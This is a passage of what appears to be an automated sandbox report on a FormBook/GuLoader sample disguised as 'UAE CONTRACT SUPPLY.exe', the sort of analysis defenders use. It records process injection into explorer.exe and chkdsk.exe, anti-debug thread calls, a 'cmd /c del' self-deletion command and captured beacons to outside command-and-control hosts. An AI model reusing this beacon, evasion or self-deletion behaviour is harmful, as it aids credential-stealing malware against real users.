                                                        Feb 25, 2021 15:28:36.840950966 CET6345INData Raw: 49 69 53 37 50 39 4e 77 5a 37 43 67 41 65 44 6a 6c 61 4d 39 6b 74 41 44 30 2b 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f
                                                        Data Ascii: IiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK
                                                        Feb 25, 2021 15:28:36.840976000 CET6346INData Raw: 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59 55
                                                        Data Ascii: xQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p
                                                        Feb 25, 2021 15:28:36.841002941 CET6347INData Raw: 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20
                                                        Data Ascii: ass="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.pardsoda.com's <a href="/cdn-cgi/l/email-protection#97e4f2e5e1f2e5d7fff6e0fcfff8e4e
                                                        Feb 25, 2021 15:28:36.841023922 CET6348INData Raw: 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 34 72
                                                        Data Ascii: com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />
                                                        Feb 25, 2021 15:28:36.841049910 CET6348INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.64975634.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:57.410073996 CET6366OUTGET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1
                                                        Host: www.sixteen3handscottages.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:57.549735069 CET6366INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:57 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "60363547-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Feb 25, 2021 15:27:34.976358891 CET142.250.184.65443192.168.2.649731CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                        CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6848 Parent PID: 5676

                                                        General

                                                        Start time:15:26:42
                                                        Start date:25/02/2021
                                                        Path:C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x400000
                                                        File size:458752 bytes
                                                        MD5 hash:9DA74A6D583C801677C0E2FDE51586BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Visual Basic
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6952 Parent PID: 6848

                                                        General

                                                        Start time:15:26:54
                                                        Start date:25/02/2021
                                                        Path:C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x400000
                                                        File size:458752 bytes
                                                        MD5 hash:9DA74A6D583C801677C0E2FDE51586BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6952

                                                        General

                                                        Start time:15:27:37
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff6f22f0000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: autoconv.exe PID: 4804 Parent PID: 3440

                                                        General

                                                        Start time:15:27:51
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                        Imagebase:0x12d0000
                                                        File size:851968 bytes
                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: chkdsk.exe PID: 392 Parent PID: 3440

                                                        General

                                                        Start time:15:27:51
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                        Imagebase:0x1340000
                                                        File size:23040 bytes
                                                        MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 5048 Parent PID: 392

                                                        General

                                                        Start time:15:27:55
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x2a0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 1068 Parent PID: 5048

                                                        General

                                                        Start time:15:27:55
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff61de10000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6848 Parent PID: 5676 UAE CONTRACT SUPPLY.exeCOMMON

                                                          Executed Functions

                                                          Function 022608D0, Relevance: 21.4, APIs: 1, Strings: 11, Instructions: 360nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationLibraryLoadThread
                                                          • String ID: WZ<$Z@$W$ #$ #$',$3'$9A$X@$z>$W
                                                          • API String ID: 543350213-2923609791
                                                          • Opcode ID: ea0b124d98382a7cab582627cab6fcab4da2a7f19ff6e61e9aa936733e00f9ee
                                                          • Instruction ID: 74ef257ad113cfda6cb37314168e3cb05e8f098e296535cd86308e1258faf9d1
                                                          • Opcode Fuzzy Hash: ea0b124d98382a7cab582627cab6fcab4da2a7f19ff6e61e9aa936733e00f9ee
                                                          • Instruction Fuzzy Hash: 80A18E2BB60307AAEF3025F84DBC7FE22976F82350FE58526DC859718CD76885C6D912
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02263606, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 445nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationLibraryLoadThread
                                                          • String ID: 0={,$1.!T$shell32
                                                          • API String ID: 543350213-2310984245
                                                          • Opcode ID: 10ea9cf100e78312e0a352bb4919f535f3e445799ec7c6466ff7f9c8497d00c2
                                                          • Instruction ID: a038f57baa42a6487b00521e620f7305d17cbb720e4a3aef8fc1c2d5f32e18fa
                                                          • Opcode Fuzzy Hash: 10ea9cf100e78312e0a352bb4919f535f3e445799ec7c6466ff7f9c8497d00c2
                                                          • Instruction Fuzzy Hash: 31E12B76A243479EDB21BFB4D8A87FA3793AF46350F604169DC928728CD770C4C2CA51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226054E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumWindows.USER32(022605BC,?,00000000,?,?,?,?,?,?,?,0226037A), ref: 02260558
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: EnumInformationThreadWindows
                                                          • String ID: 1.!T
                                                          • API String ID: 1954852945-3147410236
                                                          • Opcode ID: 5955d485d9b172f846850f32cab39c4d23d3186b2f0125aee043716f03b66021
                                                          • Instruction ID: 34156e7d7ff7290401304ebdb2badaf9ac66b0aab2620378fdc88127ecbe071f
                                                          • Opcode Fuzzy Hash: 5955d485d9b172f846850f32cab39c4d23d3186b2f0125aee043716f03b66021
                                                          • Instruction Fuzzy Hash: 59419D777203159EE720AEF08DAC7FA3797AFC6360F608129ED965B2C8D66484C5CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401348, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: #100
                                                          • String ID: VB5!6&*
                                                          • API String ID: 1341478452-3593831657
                                                          • Opcode ID: 227450bb11567f72f28857ec75f7462acda8a8976b1ed0ab10ad9a951c361d46
                                                          • Instruction ID: 424682d49057c911ef3cbc039ecc0d938f359420e643cb43aa4ddc2a6635cc32
                                                          • Opcode Fuzzy Hash: 227450bb11567f72f28857ec75f7462acda8a8976b1ed0ab10ad9a951c361d46
                                                          • Instruction Fuzzy Hash: 13A11B6544E3C16FC3138B789C6A589BFB0AE5720875E45EFC4C18F4E3D259885AC727
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022652C8, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 1.!T
                                                          • API String ID: 0-3147410236
                                                          • Opcode ID: 2307fdf5e6a399628e77e26cef94e65b7be80a539f53dccc69de9326f92fdfdc
                                                          • Instruction ID: 74db6b418101751b9cbb1b48478d595ed1192fcb6a7a2526fb6b6adb3fe955ad
                                                          • Opcode Fuzzy Hash: 2307fdf5e6a399628e77e26cef94e65b7be80a539f53dccc69de9326f92fdfdc
                                                          • Instruction Fuzzy Hash: A251E3377603069EEB205EF04DAC3FA27939F87750FA48229DD924B1CDD76444C6C901
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022605D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID: 1.!T
                                                          • API String ID: 4046476035-3147410236
                                                          • Opcode ID: 281385ae8660e80c9afe0ed13e6cb72bb25c5e623fc99f1f045c5447f836f1c6
                                                          • Instruction ID: 8e2a3f10817c252eb2e8f1d5cd1e66afe7bbc643ca1719897265821c562296cd
                                                          • Opcode Fuzzy Hash: 281385ae8660e80c9afe0ed13e6cb72bb25c5e623fc99f1f045c5447f836f1c6
                                                          • Instruction Fuzzy Hash: 6441CE737603559EE711AEB08CACBFA3752AF83754F944169ED920F1CDC66194C1CA01
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02265040, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID: 1.!T
                                                          • API String ID: 4046476035-3147410236
                                                          • Opcode ID: e2c3fb725b0be642ada5b2270549ef553c97e5e32a75dcc5fd7b979bc71c79eb
                                                          • Instruction ID: 85574d9a47234ac7311d052e4870056cf409bf6ff37c5af1001ca8a55b228582
                                                          • Opcode Fuzzy Hash: e2c3fb725b0be642ada5b2270549ef553c97e5e32a75dcc5fd7b979bc71c79eb
                                                          • Instruction Fuzzy Hash: 1F31AC73B603069EEB21AEB04D6D7FA2792AF87714F944155ED921B2CCC6A484C5CA41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022605D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationLibraryLoadThread
                                                          • String ID: 1.!T
                                                          • API String ID: 543350213-3147410236
                                                          • Opcode ID: 5d85724b0e37fb082679c3e8934fff4535a7cfefb67ea7abd938dbd3f819a2e0
                                                          • Instruction ID: 50f9bb4f6af97b455df7591c205c6f04da1eeac3552c83d11452410c3ef89659
                                                          • Opcode Fuzzy Hash: 5d85724b0e37fb082679c3e8934fff4535a7cfefb67ea7abd938dbd3f819a2e0
                                                          • Instruction Fuzzy Hash: 0131DD33B603059EEB10AEB08DAD7FA3793AF83714F944119ED921F1CCC26484C5CA41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260690, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID: 1.!T
                                                          • API String ID: 4046476035-3147410236
                                                          • Opcode ID: 8ffea73642e9b725fce4f90f117e96af82d5cf95b3119537cfbf2dc8040c10dd
                                                          • Instruction ID: 36582a4cd8310573c10ef57bb7ee0c879f105b25de7fc090e031f960fc00aa1d
                                                          • Opcode Fuzzy Hash: 8ffea73642e9b725fce4f90f117e96af82d5cf95b3119537cfbf2dc8040c10dd
                                                          • Instruction Fuzzy Hash: 3531CB73B60355AEFB11AEB08DAD7FA3B62AF83314F544165ED920F1C9C3A084C1DA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260636, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID: 1.!T
                                                          • API String ID: 4046476035-3147410236
                                                          • Opcode ID: 913aa749193f1bd34179721ad99b7fcf72f155a0959036bf3968b0b626de3dee
                                                          • Instruction ID: dd7ab30410e58ac44fbc5a9af61333de5ed1ffaad69eb3fc3ae0d5f565f7f583
                                                          • Opcode Fuzzy Hash: 913aa749193f1bd34179721ad99b7fcf72f155a0959036bf3968b0b626de3dee
                                                          • Instruction Fuzzy Hash: F4319037B647569AE710EFA08CA8BFA3751AF83354F644169DDA24F1CCC7A094C2CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260682, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationLibraryLoadThread
                                                          • String ID: 1.!T
                                                          • API String ID: 543350213-3147410236
                                                          • Opcode ID: 7c5cb19938c6be82b3b9df89290a6e44c987d9d0e7cbd08a6c864d19795865e1
                                                          • Instruction ID: 91462a12afd451a06631cad874328e77ce1a87dc49b3bc22801570d735bbfed3
                                                          • Opcode Fuzzy Hash: 7c5cb19938c6be82b3b9df89290a6e44c987d9d0e7cbd08a6c864d19795865e1
                                                          • Instruction Fuzzy Hash: 5B31BD7B7617569EE710DEA098A87FA3790FF83354F544169DC924B1CDC7609082CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226065C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID: 1.!T
                                                          • API String ID: 4046476035-3147410236
                                                          • Opcode ID: 344cca7defbefbe8fe532ac9400460a33e3700bd58fe35a65b9930504bcfa239
                                                          • Instruction ID: 2858ae315c34c5a52a25463c514d736772b80a21b41ba38a928dda1c7665ebeb
                                                          • Opcode Fuzzy Hash: 344cca7defbefbe8fe532ac9400460a33e3700bd58fe35a65b9930504bcfa239
                                                          • Instruction Fuzzy Hash: 4F21CE77B613569EEB11AFA09CAC7FA3750BF82354F544159DC924F1CCC7A095C2CA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022606A9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02264B30: LoadLibraryA.KERNELBASE(?,8802EDAC,?,022654AF,02260496,2D9CC76C,DFCB8F12,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 02264BDB
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02260711
                                                          Strings
                                                          Memory Dump Source
